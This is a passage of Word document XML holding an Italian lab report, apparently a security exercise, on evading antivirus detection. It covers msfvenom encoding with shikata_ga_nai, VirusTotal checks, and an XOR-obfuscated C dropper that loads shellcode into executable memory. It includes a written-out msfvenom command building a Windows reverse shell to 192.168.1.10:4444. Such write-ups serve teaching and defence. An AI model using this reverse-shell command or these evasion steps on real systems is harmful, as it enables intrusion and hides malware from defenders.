        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-i 3</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t>: Aumenta il numero di iterazioni dell'encoder a 3. Ogni iterazione applica l'algoritmo di codifica sul risultato precedente, generando maggiori variazioni nella firma binaria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662C2BB1" w14:textId="317210EE" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10B6801E" wp14:editId="000055E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1061720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115050" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21278"/>
                <wp:lineTo x="21533" y="21278"/>
                <wp:lineTo x="21533" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="297254405"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15050" cy="1276350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risultato della Generazione:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Il file payload_encoded.exe è stato generato con successo, risultando in una dimensione leggermente superiore del payload grezzo (435 bytes vs 354 bytes per il payload base) ma con la stessa dimensione finale dell'eseguibile (73802 bytes). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> ha confermato il successo della codifica con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> iterazioni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47950C54" w14:textId="3754B17D" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B5ED600" wp14:editId="03DEA2AC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-161925</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1775460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4076700" cy="2990850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21462"/>
                <wp:lineTo x="21499" y="21462"/>
                <wp:lineTo x="21499" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="290359638"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76700" cy="29908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5679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Sebbene l'immagine mostri solo una parte dell'output di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">, l'obiettivo di questa fase è osservare una </w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>riduzione</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> nei rilevamenti rispetto al payload base. Generalmente, anche poche iterazioni di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> possono ridurre il numero di motori antivirus che rilevano il payload in modo statico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7340E5" w14:textId="4CEA740B" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusioni sul Payload Codificato:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> L'introduzione di un encoder e di iterazioni mira a bypassare le firme statiche più elementari. I risultati (anche se non completamente visibili nell'output fornito) dovrebbero mostrare un miglioramento, seppur parziale, nella rilevabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628D7AFD" w14:textId="2A7DCE00" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. Offuscamento Avanzato: Implementazione di un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Personalizzato con XOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B42808" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">Questa fase ha esplorato una tecnica di offuscamento più avanzata e personalizzata, che non si basa unicamente sugli encoder di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>, ma sulla creazione di un "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>" autonomo. Questo approccio riflette più da vicino come i malware reali cercano di evadere i sistemi di rilevamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627098DD" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passaggi Seguiti:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A54DF3" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Generazione dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AC19D4" w14:textId="4F33451E" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.10 LPORT=4444 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>payload.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7967967B" w14:textId="7C948348" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33356474" wp14:editId="39458074">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>144145</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1033780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115050" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21415"/>
                <wp:lineTo x="21533" y="21415"/>
                <wp:lineTo x="21533" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1437046805" name="Immagine 5" descr="Immagine che contiene testo, schermata, Carattere&#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046805" name="Immagine 5" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corrett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5050" cy="1114425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t>Questa volta, il payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> (una shell CMD di base, più leggera di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">) è stato codificato con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> (1 iterazione predefinita) e salvato in formato </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> (.bin). Questo è lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> "puro" che verrà offuscato manualmente.</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604DCEE" w14:textId="245CADBC" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Offuscamento Manuale con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XOR :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="539C4DD5" w14:textId="3910F6AE" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t>È stato utilizzato uno script Python per applicare un'operazione logica XOR (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Exclusive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> OR) allo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> binario ottenuto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62C723" w14:textId="3938439A" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chiave XOR:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Una chiave fissa (0xAA) è stata scelta per l'offuscamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7E4CA1" w14:textId="1281C6CA" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27328C53" wp14:editId="1B2AA2AA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2699385</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>172720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3226435" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21355"/>
                <wp:lineTo x="21426" y="21355"/>
                <wp:lineTo x="21426" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1695675411"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26435" cy="1676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5679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Processo:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Ogni byte dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>payload.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">) viene sottoposto a un'operazione XOR con la chiave. Questo altera ogni byte, rendendo lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> irriconoscibile come tale da un'analisi statica basata su firme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E77D4" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Lo script stampa lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> offuscato in un formato di array C, pronto per essere inserito in un programma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5357FAD2" w14:textId="414A2CDC" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sviluppo del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in C:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E3F66" w14:textId="715C12E7" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t>È stato creato un programma C (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>dropper_xor.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>) con le seguenti funzionalità:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C132895" w14:textId="2AA4BC8A" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">Include l'array di byte dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>XORato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0608D824" w14:textId="61906E4A" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">Include una funzione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>xor_decrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> che, utilizzando la stessa chiave XOR (0xAA), ripristina lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> alla sua forma originale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5881DF" w14:textId="5791DCD6" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">Utilizza la funzione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> per allocare memoria eseguibile (con permessi MEM_RESERVE, MEM_COMMIT, PAGE_EXECUTE_READWRITE). Questo è un passaggio critico perché permette al programma di scrivere e poi eseguire codice arbitrario in memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B029C" w14:textId="5D708B51" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">Copia lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> decifrato nella memoria allocata (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>memcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1FCFCC" w14:textId="73503A34" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69A30DCE" wp14:editId="6878F868">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3661410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2480945" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21448"/>
                <wp:lineTo x="21395" y="21448"/>
                <wp:lineTo x="21395" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1562067161"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80945" cy="27051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5679F">
